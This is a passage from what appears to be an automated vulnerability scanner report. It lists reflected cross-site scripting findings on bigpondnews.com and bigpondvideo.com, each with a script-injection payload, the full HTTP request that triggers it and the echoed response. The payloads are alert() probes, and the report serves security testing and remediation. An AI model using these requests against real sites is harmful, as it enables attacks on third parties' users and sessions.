<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<script type="text/javascript">
MediaSmart.Utilities.initialise({
area: "WORLD51210";0A4ECC94D38"
});
</script>
...[SNIP]...

2.445. http://bigpondnews.com/articles/World/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/World/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2567b'%3bb8257ae9769 was submitted in the REST URL parameter 2. This input was echoed as 2567b';b8257ae9769 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /articles/World2567b'%3bb8257ae9769/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:30:40 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=262BF60E5EAD8AC08F11EE3E74368AD7; Path=/
Content-Language: en
Content-Length: 55078
Expires: Tue, 23 Nov 2010 03:35:40 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<!--
s.prop1='BP';
s.prop2='News';
s.prop3='News';
s.channel='World2567b';b8257ae9769';
s.prop4='Home';
s.prop5='';
s.pageName=s.prop1 + ':' + s.prop3 + ':' + s.channel + '-' + s.prop4;
s.hier1= s.prop1 + '|' + s.prop2 + '|' + s.prop3 + '|' + s.channel + '|' + s.prop4;
s.server=documen
...[SNIP]...

2.446. http://bigpondnews.com/articles/World/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://bigpondnews.com
Path:   /articles/World/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0f7a"><a>4c37b037fcd was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /articles/Worldc0f7a"><a>4c37b037fcd/2010/11/23/Lives_claimed_at_Cambodian_festival_542607.html HTTP/1.1
Host: bigpondnews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Tue, 23 Nov 2010 03:30:10 GMT
Server: Apache/2.2.14 (Unix) mod_jk/1.2.28
Set-Cookie: JSESSIONID=46A00AD74CAE0ACCB20E01D1AC71BA6E; Path=/
Content-Language: en
Content-Length: 55090
Expires: Tue, 23 Nov 2010 03:35:10 GMT
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=EmulateIE7
Cache-control: public
Connection: close
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<link rel="stylesheet" href="/bphf/re
...[SNIP]...
<a class="more-link" href="/latestarticles/Worldc0f7a"><a>4c37b037fcd/1">
...[SNIP]...

2.447. http://bigpondvideo.com/ [bd5b1%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea21cf603a85 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /

Issue detail

The value of the bd5b1%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea21cf603a85 request parameter is copied into the HTML document as plain text between tags. The payload 86921<script>alert(1)</script>3c61eb56ad1 was submitted in the bd5b1%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea21cf603a85 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?bd5b1%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea21cf603a85=186921<script>alert(1)</script>3c61eb56ad1 HTTP/1.1
Host: bigpondvideo.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=742f05fed231622424602a00ff82a961; s_cc=true; s_nr=1290483776704; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; gpv_p49=BigPond%20TV; gpv_e44=BigPond%20TV; s_sq=%5B%5BB%5D%5D; s_sv_sid=453774846568

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:06:53 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 58393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
</script>a21cf603a85=186921<script>alert(1)</script>3c61eb56ad1&navId=444&channelTitle=Videos&targetLevel=Videos.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.448. http://bigpondvideo.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bd5b1</script><script>alert(1)</script>a21cf603a85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?bd5b1</script><script>alert(1)</script>a21cf603a85=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:48:49 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: PHPSESSID=742f05fed231622424602a00ff82a961; path=/
Content-Type: text/html
Connection: close
Content-Length: 58338

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb2b91a34dc&platform=Production&phpSessionId=742f05fed231622424602a00ff82a961&bd5b1</script><script>alert(1)</script>a21cf603a85=1&navId=444&channelTitle=Videos&targetLevel=Videos.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.449. http://bigpondvideo.com/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1c92</script><script>alert(1)</script>9fcf93df57e was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?ref=Net-Head-TVd1c92</script><script>alert(1)</script>9fcf93df57e HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:07:44 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58351

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
ia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb3000e45d8&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TVd1c92</script><script>alert(1)</script>9fcf93df57e&navId=444&channelTitle=Videos&targetLevel=Videos.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.450. http://bigpondvideo.com/AFL/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /AFL/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d11ca</script><script>alert(1)</script>59c968aaca2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AFL/?d11ca</script><script>alert(1)</script>59c968aaca2=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:31 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb302f8cc5e&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&d11ca</script><script>alert(1)</script>59c968aaca2=1&navId=6&channelTitle=AFL&targetLevel=Videos.Sport.AFL.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.451. http://bigpondvideo.com/AFL/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /AFL/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 776b6</script><script>alert(1)</script>6d981e37a4e was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /AFL/?ref=Net-Head-TV-Sport-AFL776b6</script><script>alert(1)</script>6d981e37a4e HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:26 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb302a81502&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Sport-AFL776b6</script><script>alert(1)</script>6d981e37a4e&navId=6&channelTitle=AFL&targetLevel=Videos.Sport.AFL.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.452. http://bigpondvideo.com/GamesLatest/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /GamesLatest/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7b69d</script><script>alert(1)</script>22ea0e71a0f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GamesLatest/?7b69d</script><script>alert(1)</script>22ea0e71a0f=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:54 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb30466a830&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&7b69d</script><script>alert(1)</script>22ea0e71a0f=1&navId=473&channelTitle=Latest&targetLevel=Videos.Games.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.453. http://bigpondvideo.com/GamesLatest/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /GamesLatest/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4faba</script><script>alert(1)</script>f126320f05 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GamesLatest/?ref=Net-Head-TV-Games-Latest4faba</script><script>alert(1)</script>f126320f05 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:50 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58333

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
flashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb304266af5&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Games-Latest4faba</script><script>alert(1)</script>f126320f05&navId=473&channelTitle=Latest&targetLevel=Videos.Games.Latest&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.454. http://bigpondvideo.com/GamesTrailers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /GamesTrailers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 266b2</script><script>alert(1)</script>eb13f22a9b9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GamesTrailers/?266b2</script><script>alert(1)</script>eb13f22a9b9=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:00 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58329

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb304d6e594&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&266b2</script><script>alert(1)</script>eb13f22a9b9=1&navId=304&channelTitle=Trailers&targetLevel=Videos.Games.Trailers.All Genres&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.455. http://bigpondvideo.com/GamesTrailers/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /GamesTrailers/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 87559</script><script>alert(1)</script>baddc826b84 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /GamesTrailers/?ref=Net-Head-TV-Games-Trailers87559</script><script>alert(1)</script>baddc826b84 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:48 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
ashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb30410ef15&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Games-Trailers87559</script><script>alert(1)</script>baddc826b84&navId=304&channelTitle=Trailers&targetLevel=Videos.Games.Trailers.All Genres&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.456. http://bigpondvideo.com/Music/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Music/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 36449</script><script>alert(1)</script>4c6e1c63c21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Music/?36449</script><script>alert(1)</script>4c6e1c63c21=1 HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:09:00 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58295

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
://www.macromedia.com/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb304dc68da&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&36449</script><script>alert(1)</script>4c6e1c63c21=1&navId=442&channelTitle=Music&targetLevel=Videos.Music.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.457. http://bigpondvideo.com/Music/ [ref parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /Music/

Issue detail

The value of the ref request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45e3e</script><script>alert(1)</script>92592926c1f was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Music/?ref=Net-Head-TV-Music45e3e</script><script>alert(1)</script>92592926c1f HTTP/1.1
Host: bigpondvideo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: gpv_p49=BigPond%20TV; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1290484594824; PHPSESSID=9b7c6ddb0174e371d6c21a37721a97ca; gpv_e48=BP%3ABigPond%20TV%3AHomepage; gpv_p43=BP%3ABigPond%20TV%3AHomepage; s_sv_sid=453774846568; gpv_e44=BigPond%20TV;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 03:08:56 GMT
Server: Apache/2.2.14 (Win32) mod_fcgid/2.3.5
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 58314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="X-UA-C
...[SNIP]...
/go/getflashplayer',
                                                   'wmode','transparent',
                                                   'FlashVars','randFlashId=NV4ceb30485771d&platform=Production&phpSessionId=9b7c6ddb0174e371d6c21a37721a97ca&ref=Net-Head-TV-Music45e3e</script><script>alert(1)</script>92592926c1f&navId=442&channelTitle=Music&targetLevel=Videos.Music.Top Videos&invoke=1'+"&screenW="+screen.width+"&screenH="+screen.height); //end AC code
                           </script>
...[SNIP]...

2.458. http://bigpondvideo.com/NRL/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://bigpondvideo.com
Path:   /NRL/

Issue detail

